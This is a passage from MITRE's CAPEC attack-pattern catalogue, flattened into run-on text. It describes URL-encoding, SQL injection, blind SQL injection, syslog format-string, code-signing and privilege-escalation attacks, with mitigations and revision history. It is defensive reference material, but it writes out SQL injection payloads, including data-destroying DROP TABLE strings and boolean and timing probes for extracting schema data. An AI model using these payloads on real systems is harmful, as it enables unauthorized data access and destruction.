URL based attacks. Sometime the percent escaping can be used to obfuscate the attack itself. Alternative method of data encoding can be used. Obfuscation technique such as IP address encoding can also be used. [R.64.3] Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Test your decoding process against malicious input. Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. When client input is required from web-based forms, avoid using the "GET" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the "POST method whenever possible. Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process. Refer to the RFCs to safely decode URL. Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive. There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx). Availability DoS: resource consumption (other) Denial of Service Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Read files or directories Confidentiality Access_Control Authorization Gain privileges / assume identity 177 Targeted 171 Targeted 173 Targeted 172 Targeted 73 Targeted 21 Targeted 22 Targeted 74 Targeted 20 Targeted 697 Targeted 707 Targeted 1000 Attack Pattern ChildOf 72 1000 Attack Pattern PeerOf 71 1000 Attack Pattern PeerOf 79 1000 Attack Pattern ChildOf 79 1000 Attack Pattern PeerOf 72 1000 Attack Pattern PeerOf 43 1000 Attack Pattern ChildOf 267 1000 Category ChildOf 126 Reluctance to Trust Penetration Medium High Medium All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-20 - Input Validation Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/20.html Gunter Ollmann URL Encoded Attacks - Attacks using the common web browser CGISecurity.com http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html T. Berners-Lee R. Fielding L. Masinter RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax January 2005 http://www.ietf.org/rfc/rfc3986.txt T. Berners-Lee L. Masinter M. McCahill RFC 1738 - Uniform Resource Locators (URL) December 1994 http://www.ietf.org/rfc/rfc1738.txt HTML URL Encoding Reference URL Encoding Reference W3Schools.com Refsnes Data http://www.w3schools.com/tags/ref_urlencode.asp The URLEncode and URLDecode Page Albion Research Ltd http://www.albionresearch.com/misc/urlencode.php David Wheeler Secure Programming for Linux and Unix HOWTO 5.11.4. Validating Hypertext Links (URIs/URLs) http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS [R.64.1][REF-2] Cigital, Inc 2007-03-01 [R.64.1][REF-2] Cigital, Inc 2007-03-01 Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Description Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Examples-Instances, Solutions_and_Mitigations Attackers can capture application code bound for the client and can use it, as-is or through reverse-engineering, to glean sensitive information or exploit the trust relationship between the client and server. Such code may belong to a dynamic update to the client, a patch being applied to a client component or any such interaction where the client is authorized to communicate with the server. The attacker sets up a sniffer (and an interceptor, as the motive of the attack may be) in the path between the server and the client The captured code is then used as part of a larger attack, such as reverse-engineering the code or denying its delivery to the client or altering its contents on way to the client The attacker must have the ability to place himself in the communication path between the client and server. The targeted application must receive some application code from the server; for example, dynamic updates, patches, applets or scripts. The attacker must be able to employ a sniffer on the network without being detected. High Low Attacker receives notification that the computer/OS/application has an available update, loads a network sniffing tool, and extracts update data from subsequent communication. The attacker then proceeds to reverse engineer the captured stream. Plain code, such as applets or JavaScript, is also part of the executing application. If such code is transmitted unprotected, the attacker can capture the code and possibly reverse engineer it to gain sensitive information, such as encryption keys, validation algorithms and such. Medium The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network. Also if the attacker plans to employ a man-in-the-middle attack, the client or server must not realize this. Finally, the attacker needs to regenerate source code from binary code if the need be. The Attacker needs the ability to capture communications between the client being updated and the server providing the update. In the case that encryption obscures client/server communication the attacker will either need to lift key material from the client. Confidentiality Read application data Confidentiality Access_Control Authorization Gain privileges / assume identity 319 Targeted 311 Secondary 318 Secondary 693 Targeted 719 Targeted 1000 Attack Pattern ChildOf 37 1000 Attack Pattern ChildOf 158 Do not store secrets in client code All potentially sensitive data, including code, transmitted to the client must be encrypted Never Assuming that Your Secrets Are Safe Securing the Weakest Link Use Well-Known Cryptography Appropriately and Correctly Use Authentication Mechanisms, Where Appropriate, Correctly Reconnaissance Exploitation High Medium Low Client-Server All All All John Steven Cigital, Inc 2007-02-10 Initial core pattern content John Steven Cigital, Inc 2007-02-10 Initial core pattern content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Description Summary, Examples-Instances This attack exploits target software that constructs SQL statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL Injection results from failure of the application to appropriately validate input. When specially crafted user-controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. Depending upon the database and the design of the application, it may also be possible to leverage injection to have the database execute system-related commands of the attackers' choice. SQL Injection enables an attacker to talk directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database. In order to successfully inject SQL and retrieve information from a database, an attacker: Survey application The attacker first takes an inventory of the functionality exposed by the application. Spider web sites for all available links env-Web Sniff network communications with application using a utility such as WireShark. env-ClientServer env-Peer2Peer env-CommProtocol At least one data input to application identified. No inputs to application identified. Note that just because no inputs are identified does not mean that the application will not accept any. Determine user-controllable input susceptible to injection Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to SQL injection, attempt to inject characters that have special meaning in SQL (such as a single quote character, a double quote character, two hyphens, a parenthesis, etc.). The goal is to create a SQL query with an invalid syntax. Use web browser to inject input through text fields or through HTTP GET parameters. env-Web Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc. env-Web Use network-level packet injection tools such as netcat to inject input env-Web env-ClientServer env-Peer2Peer env-CommProtocol Use modified client (modified by reverse engineering) to inject input. env-ClientServer env-Peer2Peer env-CommProtocol Attacker receives normal response from server. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Attacker receives an error message from server indicating that there was a problem with the SQL query. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException) env-Web env-ClientServer env-Peer2Peer env-CommProtocol At least one user-controllable input susceptible to injection found. No user-controllable input susceptible to injection found. Search for and alert on unexpected SQL keywords in application logs (e.g. SELECT, DROP, etc.). Input validation of user-controlled data before including it in a SQL query Use parameterized queries (e.g. PreparedStatement in Java, and Command.Parameters.Add() to set query parameters in .NET) Experiment and try to exploit SQL Injection vulnerability After determining that a given input is vulnerable to SQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, or to modify or delete information in the database. Use public resources such as "SQL Injection Cheat Sheet" at http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/, and try different approaches for adding logic to SQL queries. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Add logic to query, and use detailed error messages from the server to debug the query. For example, if adding a single quote to a query causes an error message, try : "' OR 1=1; --", or something else that would syntactically complete a hypothesized query. Iteratively refine the query. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Use "Blind SQL Injection" techniques to extract information about the database schema. env-Web env-ClientServer env-Peer2Peer env-CommProtocol If a denial of service attack is the goal, try stacking queries. This does not work on all platforms (most notably, it does not work on Oracle or MySQL). Examples of inputs to try include: "'; DROP TABLE SYSOBJECTS; --" and "'); DROP TABLE SYSOBJECTS; --". These particular queries will likely not work because the SYSOBJECTS table is generally protected. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Success outcome in previous step. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Failure outcome in previous step. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Attacker achieves goal of unauthorized system access, denial of service, etc. Attacker unable to exploit SQL Injection vulnerability. SQL queries used by the application to store, retrieve or modify data. User-controllable input that is not properly validated by the application as part of SQL queries. High Very High Injection With PHP-Nuke versions 7.9 and earlier, an attacker can successfully access and modify data, including sensitive contents such as usernames and password hashes, and compromise the application through SQL Injection. The protection mechanism against SQL Injection employs a blacklist approach to input validation. However, because of improper blacklisting, it is possible to inject content such as "foo'/**/UNION" or "foo UNION/**/" to bypass validation and glean sensitive information from the database. CVE-2006-5525 Low It is fairly simple for someone with basic SQL knowledge to perform SQL injection, in general. In certain instances, however, specific knowledge of the database employed may be required. None The attacker tries to inject characters that can cause a SQL error, such as single-quote (') or keywords such as "UNION" and "OR". If the injection of such characters into the input causes a SQL error and the resulting error is displayed unfiltered, the attacker can begin to determine the nature of input validation and structure of SQL queries. A typical error resulting from such injection would look like: "You have an error in your SQL Syntax. Check your manual for the right syntax to use near ') FROM db_users.user_table" With available design documentation and code, the attacker can determine whether all user-controllable inputs are being validated or not, and also the structure of SQL queries that such inputs feed into. Too many false or invalid queries to the database, especially those caused by malformed input. Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(') or SQL-comments (--) based on the context in which they appear. Use of parameterized queries or stored procedures - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails. Note that SQL Injection is possible even in the presence of stored procedures if the eventual query is constructed dynamically. Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application. Integrity Modify application data Confidentiality Read application data Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Access_Control Authorization Gain privileges / assume identity User-controllable input used as part of non-parameterized SQL queries: This may include input fields on web forms, data in user-accessible files or even command-line parameters. SQL statements intended to reveal information or run malicious code Back-end database When malicious SQL content is executed by the database, it can lead to arbitrary queries being executed, causing disclosure of information, unauthorized access, privilege escalation and possibly system compromise. 89 Targeted 74 Secondary 20 Secondary 390 Secondary 697 Secondary 713 Secondary 707 Secondary 1000 Category ChildOf 152 333 Category HasMember 352 Special characters in user-controllable input must be escaped before use by the application. Only use parameterized stored procedures to query the database. Input data must be revalidated in the parameterized stored procedures. Custom error pages must be used to handle exceptions such that they do not reveal any information about the architecture of the application or the database. Reluctance to Trust Failing Securely Defense in Depth Never Use Input as Part of a Directive to any Internal Component Handle All Errors Safely Penetration Exploitation High High High All All All All Common Weakness Enumeration (CWE) CWE-89 - SQL Injection Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/89.html Common Weakness Enumeration (CWE) CWE-20 - Input Validation Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/20.html Common Weakness Enumeration (CWE) CWE-390 - Improper Error Handling Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/390.html Chiradeep B Chhaya 2007-01-12 Second Draft Chiradeep B Chhaya 2007-01-12 Second Draft Malik Hamro Cigital, Inc 2007-02-27 Reformat to new schema and review Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Malik Hamro Cigital, Inc 2007-02-27 Reformat to new schema and review Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Description Summary This attack targets the format string vulnerabilities in the syslog() function. An attacker would typically inject malicious input in the format string parameter of the syslog function. This is a common problem, and many public vulnerabilities and associated exploits have been posted. The attacker finds that he can inject data to the format string parameter of Syslog(). The attacker craft a malicious input and inject it into the format string parameter. From now on, the attacker can execute arbitrary code and do more damage. The format string argument of the Syslog function can be tainted with user supplied data. Very High High Injection Format string vulnerability in TraceEvent function for ntop before 2.1 allows remote attackers to execute arbitrary code by causing format strings to be injected into calls to the syslog function, via (1) an HTTP GET request, (2) a user name in HTTP authentication, or (3) a password in HTTP authentication. CVE-2002-0412 If the source code of the application is available, an attacker can use static analysis tools to spot a syslog vulnerability (a simple grep may also work). If the source code is not available, automated tools such as Fuzzer and advanced Web Scanner can be used. If the tool supplied data reaches the syslog's format string argument, the application under scrutiny may have unexpected behavior. If the source code is not available, a more complex technique involve the use of library and system call tracer combined with the use of binary auditing tool such as IDA Pro. Reverse Engineering technique can be used to find format string vulnerability in the syslog function call. For instance it is possible to get the address of the buffer that is later used as the format string when reading data The code should be reviewed for misuse of the Syslog function call. Manual or automated code review can be used. The reviewer needs to ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, do not use the %n operator in format strings. The following code shows a correct usage of Syslog(): syslog(LOG_ERR, "%s", cmdBuf); The following code shows a vulnerable usage of Syslog(): syslog(LOG_ERR, cmdBuf); // the buffer cmdBuff is taking user supplied data. Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Availability DoS: crash / exit / restart Confidentiality Access_Control Authorization Gain privileges / assume identity Integrity Modify memory Untrusted user supplied data is the injection vector. The maliciously crafted data can read from the stack if passed to the Syslog function as a format String. The signature of the syslog function is as following: void syslog(int priority, const char *format, ...); A vulnerable usage would be: syslog(LOG_ERR, cmdBuf); where cmdBuf is a user controlled data which leads to a format string vulnerability. The activation zone is the format String argument which accepts user supplied data. The impacts of this attack can be execution of arbitrary code. Execution of arbitrary code can lead to many problems such as corruption of data, unauthorized access, etc. 120 Secondary 134 Targeted 74 Secondary 20 Secondary 680 Targeted 697 Targeted CVE-2002-0573 format string in bad call to syslog function CVE-2001-0717 format string in bad call to syslog function CVE-2002-0412 format string in bad call to syslog function 1000 Attack Pattern ChildOf 100 333 Category HasMember 339 Choose a language which is not subject to this flaw. Do not use the Syslog() in your implementation. Use manual or automated code review to spot potential format string vulnerability in functions such as Syslog(), Vsyslog(), snprintf(), etc. Reluctance to Trust Verify that input is of a limited size. If the message is coming from an outside source, check for %s type parameters and ensure that bounds will not be overwritten. Don't use text from an outside source as a format string. Penetration Exploitation High High High All All All All C C++ G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-119: Buffer Errors Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/119.html scut team teso Exploiting Format String Vulnerabilities http://doc.bughunter.net/format-string/exploit-fs.html Halvar Flake Auditing binaries for security vulnerabilities http://www.blackhat.com/presentations/bh-europe-00/HalvarFlake/HalvarFlake.ppt Fortify Taxonomy of Vulnerabilities Fortify Software http://vulncat.fortifysoftware.com/1/FS.html Syslog man page http://www.rt.com/man/syslog.3.html [R.67.1][REF-2] Cigital, Inc 2007-03-01 [R.67.1][REF-2] Cigital, Inc 2007-03-01 Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Activation_Zone, Attack_Prerequisite, Attack_Step_Description, Comment, Description, and Solution_or_Mitigation Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases Because languages use code signing facilities to vouch for code's identity and to thus tie code to its assigned privileges within an environment, subverting this mechanism can be instrumental in an attacker escalating privilege. Any means of subverting the way that a virtual machine enforces code signing classifies for this style of attack. This pattern does not include circumstances through which a signing key has been stolen. A framework-based language that supports code signing (such as, and most commonly, Java or .NET) Deployed code that has been signed by its authoring vendor, or a partner. The attacker will, for most circumstances, also need to be able to place code in the victim container. This does not necessarily mean that they will have to subvert host-level security, except when explicitly indicated. Very High Low Spoofing API Abuse In old versions (prior to 3.0b4) of the Netscape web browser Attackers able to foist a malicious Applet into a client's browser could execute the "Magic Coat" attack. In this attack, the offending Applet would implement its own getSigners() method. This implementation would use the containing VM's APIs to acquire other Applet's signatures (by calling _their_ getSigners() method) and if any running Applet had privileged-enough signature, the malicious Applet would have inherited that privilege just be (metaphorically) donning the others' coats. Some (older) web browsers allowed scripting languages, such as JavaScript, to call signed Java code. In these circumstances, the browser's VM implementation would choose not to conduct stack inspection across language boundaries (from called signed Java to calling JavaScript) and would short-circuit "true" at the language boundary. Doing so meant that the VM would allow any (unprivileged) script to call privileged functions within signed code with impunity, causing them to fall prey to luring attacks. The ability to load unsigned code into the kernel of earlier versions of Vista and bypass integrity checking is an example of such subversion. In the proof-of-concept, it is possible to bypass the signature-checking mechanism Vista uses to load device drivers. High Subverting code signing is not a trivial activity. Most code signing and verification schemes are based on use of cryptography and the attacker needs to have an understand of these cryptographic operations in good detail. Additionally the attacker also needs to be aware of the way memory is assigned and accessed by the container since, often, the only way to subvert code signing would be to patch the code in memory. Finally, a knowledge of the platform specific mechanisms of signing and verifying code is a must. The Attacker needs no special resources beyond the listed prerequisites in order to conduct this style of attack. Understanding, and possibly exploiting, the effect of certain flags or environment variables on code signing. Introducing unmanaged code into a container-managed environment A given code signing scheme may be fallible due to improper use of cryptography. Developers must never roll out their own cryptography, nor should existing primitives be modified or ignored. If an attacker cannot attack the scheme directly, he might try to alter the environment that affects the signing and verification processes. A possible mitigation is to avoid reliance on flags or environment variables that are user-controllable. Confidentiality Access_Control Authorization Gain privileges / assume identity 325 Targeted 328 Targeted CVE-2006-5201 Multiple packages on Sun Solaris, including (1) NSS; (2) Java JDK and JRE 5.0 Update 8 and earlier, SDK and JRE 1.4.x up to 1.4.2_12, and SDK and JRE 1.3.x up to 1.3.1_19; (3) JSSE 1.0.3_03 and earlier; (4) IPSec/IKE; (5) Secure Global Desktop; and (6) StarOffice, when using an RSA key with exponent 3, removes PKCS-1 padding before generating a hash, which allows remote attackers to forge a PKCS #1 v1.5 signature that is signed by that RSA key and prevents these products from correctly verifying X.509 and other certificates that use PKCS #1. CVE-2006-4790 verify.c in GnuTLS before 1.4.4, when using an RSA key with exponent 3, does not properly handle excess data in the digestAlgorithm.parameters field when generating a hash, which allows remote attackers to forge a PKCS #1 v1.5 signature that is signed by that RSA key and prevents GnuTLS from correctly verifying X.509 and other certificates that use PKCS, a variant of CVE-2006-4339. 1000 Category ChildOf 232 Use Well-Known Cryptography Appropriately and Correctly Exploitation High High High Client-Server SOA All All All John Steven Cigital, Inc 2007-02-10 Initial core pattern content John Steven Cigital, Inc 2007-02-10 Initial core pattern content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Examples-Instances, Resources_Required This attack targets programs running with elevated privileges. The attacker would try to leverage a bug in the running program and get arbitrary code to execute with elevated privileges. For instance an attacker would look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break. The malicious user try to execute its code at the same level as a privileged system call. The attacker probes for programs running with elevated privileges. The attacker finds a bug in a program running with elevated privileges. The attacker exploits the bug that she has found. For instance she can try to inject and execute arbitrary code or write to OS resources. The targeted program runs with elevated OS privileges. The targeted program accepts input data from the user or from another program. The targeted program does not perform input validation properly. The targeted program does not fail safely. For instance when a program fails it may authorize restricted access to anyone. The targeted program has a vulnerability such as buffer overflow which may be exploited if a malicious user can inject unvalidated data. For instance a buffer overflow interrupts the program as it executes, and makes it run additional code supplied by the attacker. If the program under attack has elevated privileges to the OS, the attacker can elevate its privileges (such as having root level access). The targeted program is giving away information about itself. Before performing such attack, an eventual attacker may need to gather information about the services running on the host target. The more the host target is verbose about the services that are running (version number of application, etc.) the more information can be gather by an attacker. This attack often requires communicating with the host target services directly. For instance Telnet may be enough to communicate with the host target. Very High Very High Injection API Abuse Protocol Manipulation Flooding Low An attacker can use a tool to scan and automatically launch an attack against known issues. A tool can also repeat a sequence of instructions and try to brute force the service on the host target, an example of that would be the flooding technique. Medium High More advanced attack may require knowledge of the protocol spoken by the host service. Probing technique include fuzzing (sending random data in order to fail the service on the host target), brute forcing (with automated tools), network scanning to determine which services are available and running on the target host. There are freely available tools to probe and gather information from host target. For instance, the attacker can find out that a host target has not been patched by collecting such information. The log can have a trace of abnormal activity. Also if abnormal activity is detected on the host target. For instance flooding should be seen as abnormal activity and the target host may decide to take appropriate action in order to mitigate the attack (data filtering or blocking). Resource exhaustion is also a sign of abnormal activity. The attacker may try to hide her attack by forging the host's logs. The attacker has interest in mimicking a legitimate call to the program or service under threat. Apply the principle of least privilege. Validate all untrusted data. Apply the latest patches. Scan your services and disable the ones which are not needed and are exposed unnecessarily. Exposing programs increases the attack surface. Only expose the services which are needed and have security mechanisms such as authentication built around them. Avoid revealing information about your system (e.g., version of the program) to anonymous users. Make sure that your program or service fail safely. What happen if the communication protocol is interrupted suddenly? What happen if a parameter is missing? Does your system have resistance and resilience to attack? Fail safely when a resource exhaustion occurs. If possible use a sandbox model which limits the actions that programs can take. A sandbox restricts a program to a set of privileges and commands that make it difficult or impossible for the program to cause any damage. Check your program for buffer overflow and format String vulnerabilities which can lead to execution of malicious code. Monitor traffic and resource usage and pay attention if resource exhaustion occurs. Protect your log file from unauthorized modification and log forging. Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Access_Control Authorization Gain privileges / assume identity Availability DoS: resource consumption (memory) Denial of Service 250 Targeted 264 Targeted 15 Secondary CVE-2004-0213 Utility Manager in Windows 2000 launches winhlp32.exe while Utility Manager is running with raised privileges, which allows local users to gain system privileges via a "Shatter" style attack that sends a Windows message to cause Utility Manager to launch winhlp32 by directly accessing the context sensitive help and bypassing the GUI, then sending another message to winhlp32 in order to open a user-selected file, a different vulnerability than CVE-2003-0908. 1000 Attack Pattern ChildOf CanPrecede 8 1000 Attack Pattern ChildOf CanPrecede 9 1000 Attack Pattern ChildOf CanPrecede 10 1000 Attack Pattern ChildOf CanPrecede 67 1000 Category ChildOf 232 A user must be authenticated if she invokes a privileged program. Reluctance to Trust Least Privilege Fail Securely Defense in Depth Any guideline related to the buffer overflow and format String vulnerability. Patch programs with the latest patches from Vendors. Ensure log integrity Validate all untrusted input Exploitation High High Low All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-214: Failure to protect stored data from modification Draft The MITRE Corporation http://cwe.mitre.org/data/definitions/214.html Common Weakness Enumeration (CWE) CWE-15: Setting manipulation Draft The MITRE Corporation http://cwe.mitre.org/data/definitions/15.html Common Weakness Enumeration (CWE) CWE-250: Often Misused: Privilege Management Draft The MITRE Corporation http://cwe.mitre.org/data/definitions/250.html Common Weakness Enumeration (CWE) CWE-264: Permissions, Privileges, and Access Controls Draft The MITRE Corporation http://cwe.mitre.org/data/definitions/264.html [R.69.1][REF-2] Cigital, Inc 2007-03-01 [R.69.1][REF-2] Cigital, Inc 2007-03-01 Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Skill_or_Knowledge_Level and Skill_or_Knowledge_Type Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Obfuscation_Techniques, Solutions_and_Mitigations Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages are considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the attacker constructs input strings that probe the target through simple Boolean SQL expressions. The attacker can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. Applied iteratively, the attacker determines how and where the target is vulnerable to SQL Injection. For example, an attacker may try entering something like "username' AND 1=1; --" in an input field. If the result is the same as when the attacker entered "username" in the field, then the attacker knows that the application is vulnerable to SQL Injection. The attacker can then ask yes/no questions from the database server to extract information from it. For example, the attacker can extract table names from a database using the following types of queries: "username' AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108". If the above query executes properly, then the attacker knows that the first character in a table name in the database is a letter between m and z. If it doesn't, then the attacker knows that the character must be between a and l (assuming of course that table names only contain alphabetic characters). By performing a binary search on all character positions, the attacker can determine all table names in the database. Subsequently, the attacker may execute an actual attack and send something like: "username'; DROP TABLE trades; -- Hypothesize SQL queries in application Generated hypotheses regarding the SQL queries in an application. For example, the attacker may hypothesize that his input is passed directly into a query that looks like: "SELECT * FROM orders WHERE ordernum = _____" or "SELECT * FROM orders WHERE ordernum IN (_____)" or "SELECT * FROM orders WHERE ordernum in (_____) ORDER BY _____" Of course, there are many other possibilities. Research types of SQL queries and determine which ones could be used at various places in an application. env-All Determine how to inject information into the queries Determine how to inject information into the queries from the previous step such that the injection does not impact their logic. For example, the following are possible injections for those queries: "5' OR 1=1; --" and "5) OR 1=1; --" and "ordernum DESC; --" Add clauses to the SQL queries such that the query logic does not change. env-All Add delays to the SQL queries in case server does not provide clear error messages (e.g. WAITFOR DELAY '0:0:10' in SQL Server or BENCHMARK(1000000000,MD5(1) in MySQL). If these can be injected into the queries, then the length of time that the server takes to respond reveals whether the query is injectable or not. env-All At least one way to complete a hypothesized SQL query that would violate the application developer's assumptions. Determine user-controllable input susceptible to injection Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to SQL injection, attempt to inject the values determined in the previous step. If an error does not occur, then the attacker knows that the SQL injection was successful. Use web browser to inject input through text fields or through HTTP GET parameters. env-Web Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc. env-Web Use network-level packet injection tools such as netcat to inject input env-Web env-ClientServer env-Peer2Peer env-CommProtocol Use modified client (modified by reverse engineering) to inject input. env-ClientServer env-Peer2Peer env-CommProtocol Attacker receives normal response from server. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Response takes expected amount of time after delay is injected. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException) env-Web env-ClientServer env-Peer2Peer env-CommProtocol At least one user-controllable input susceptible to injection found. No user-controllable input susceptible to injection found. Unusual queries such as the ones described in the previous step, in application logs. Log files may contain unusual messages such as "User bob' OR 1=1; -- logged in". Operators should be alerted when such SQL commands appear in the logs. Input validation of user-controlled data before including it in a SQL query Use APIs that help mitigate SQL injection (such as PreparedStatement in Java) Determine database type Determines the type of the database, such as MS SQL Server or Oracle or MySQL, using logical conditions as part of the injected queries Try injecting a string containing char(0x31)=char(0x31) (this evaluates to 1=1 in SQL Server only) env-Web env-ClientServer env-Peer2Peer env-CommProtocol Try injecting a string containing 0x313D31 (this evaluates to 1=1 in MySQL only) env-Web env-ClientServer env-Peer2Peer env-CommProtocol Inject other database-specific commands into input fields susceptible to SQL Injection. The attacker can determine the type of database that is running by checking whether the query executed successfully or not (i.e. whether the attacker received a normal response from the server or not). env-Web env-ClientServer env-Peer2Peer env-CommProtocol Success outcome in previous step env-Web env-ClientServer env-Peer2Peer env-CommProtocol Failure outcome in previous step env-Web env-ClientServer env-Peer2Peer env-CommProtocol Database platform in use discovered. Database platform in use not discovered. Extract information about database schema Extract information about database schema by getting the database to answer yes/no questions about the 